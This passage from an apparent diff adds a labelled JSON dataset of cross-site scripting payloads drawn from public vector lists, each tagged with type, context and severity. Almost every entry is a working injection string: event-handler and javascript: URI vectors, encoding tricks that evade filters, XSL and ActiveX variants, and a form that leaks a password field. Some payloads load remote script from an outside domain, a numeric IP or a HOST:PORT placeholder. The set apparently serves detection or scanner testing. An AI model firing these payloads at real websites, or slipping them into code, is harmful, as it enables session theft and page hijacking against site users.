"html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"133\"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"134\"><xmp>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<%", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</xmp>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "x='<%'", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</script> %>/", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "alert(2)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"135\"><?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<template match=\"/\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</template>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</stylesheet>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"136\"><form action=\"\" method=\"post\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<input name=\"username\" value=\"admin\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<input name=\"password\" type=\"password\" value=\"secret\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<input name=\"injected\" value=\"injected\" dirname=\"password\" />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<input type=\"submit\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</form>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"137\"><svg>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"?\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<circle r=\"400\"></circle>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<animate attributeName=\"xlink:href\" begin=\"0\" from=\"javascript:alert(137)\" to=\"&\" />", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"138\"><link rel=\"import\" href=\"test.svg\" />//[\"'`-->]]>]</div><div id=\"139\"><iframe srcdoc=\"&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;\" />//[\"'`-->]]>]</div>undefined", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg onload=alert(1)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"><svg onload=alert(1)//", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"onmouseover=alert(1)//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"autofocus/onfocus=alert(1)//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "'-alert(1)-'", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "'-alert(1)//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\\'-alert(1)//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "</script><svg onload=alert(1)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable onblur=alert(1)>lose focus!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onclick=alert(1)>click this!", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x oncopy=alert(1)>copy this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x oncontextmenu=alert(1)>right click this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x oncut=alert(1)>copy this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x ondblclick=alert(1)>double click this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x ondrag=alert(1)>drag this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable onfocus=alert(1)>focus this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable oninput=alert(1)>input here!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable onkeydown=alert(1)>press any key!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable onkeypress=alert(1)>press any key!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable onkeyup=alert(1)>press any key!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onmousedown=alert(1)>click this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onmousemove=alert(1)>hover this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onmouseout=alert(1)>hover this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onmouseover=alert(1)>hover this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onmouseup=alert(1)>click this!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x contenteditable onpaste=alert(1)>paste here!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script>alert(1)//", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script>alert(1)<!–", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script src=//brutelogic.com.br/1.js>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script src=//3334957647/1>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "%3Cx onxxx=alert(1)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<%78 onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x %6Fnxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x o%6Exxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x on%78xx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onxxx%3D1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<X onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x OnXxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<X OnXxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onxxx=1 onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x/onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x%09onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x%0Aonxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x%0Conxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x%0Donxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x%2Fonxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x 1='1'onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x 1=\"1\"onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x </onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x 1=\">\" onxxx=1", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<http://onxxx%3D1/", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<x onxxx=alert(1) 1='", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "'onload=alert(1)><svg/1='", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "'>alert(1)</script><script/1='", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "`-alert(1)\">'onload=\"`<svg/1='", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script>alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script src=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<iframe src=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<embed src=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<a href=javascript:alert(1)>click", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<math><brute href=javascript:alert(1)>click", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<form action=javascript:alert(1)><input type=submit>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<isindex action=javascript:alert(1) type=submit value=click>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<form><button formaction=javascript:alert(1)>click", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<form><input formaction=javascript:alert(1) type=submit value=click>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<form><input formaction=javascript:alert(1) type=image value=click>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<form><input formaction=javascript:alert(1) type=image src=SOURCE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<isindex formaction=javascript:alert(1) type=submit value=click>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<object data=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<svg><script xlink:href=data:,alert(1) />", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<math><brute xlink:href=javascript:alert(1)>click", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<html ontouchstart=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<html ontouchend=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<html ontouchmove=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<html ontouchcancel=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onorientationchange=alert(1)>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"><img src=1 onerror=alert(1)>.gif", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script src=\"data:&comma;alert(1)//", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"><script src=data:&comma;alert(1)//", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script src=\"//brutelogic.com.br&sol;1.js&num;", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"><script src=//brutelogic.com.br&sol;1.js&num;", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<link rel=import href=\"data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "\"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<base href=//0>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script/src=\"data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onload=alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onpageshow=alert(1)>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onfocus=alert(1)>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onhashchange=alert(1)><a href=#x>click this!#x", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onscroll=alert(1)><br><br><br><br>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onresize=alert(1)>press F12!", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<body onhelp=alert(1)>press F1! (MSIE)", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<marquee onstart=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<marquee loop=1 width=0 onfinish=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<audio src onloadstart=alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<video onloadstart=alert(1)><source>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<input autofocus onblur=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<keygen autofocus onfocus=alert(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<form onsubmit=alert(1)><input type=submit>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<select onchange=alert(1)><option>1<option>2", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<menu id=x contextmenu=x onshow=alert(1)>right click me!", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "BRUTELOGIC-XSS-STRINGS" + } + }, + { + "payload": "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "'`\"><\\x3Cscript>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "'`\"><\\x00script>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<img src=1 href=1 onerror=\"javascript:alert(1)\"></img>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<audio src=1 href=1 onerror=\"javascript:alert(1)\"></audio>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<video src=1 href=1 onerror=\"javascript:alert(1)\"></video>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body src=1 href=1 onerror=\"javascript:alert(1)\"></body>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<image src=1 href=1 onerror=\"javascript:alert(1)\"></image>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>", + "category": 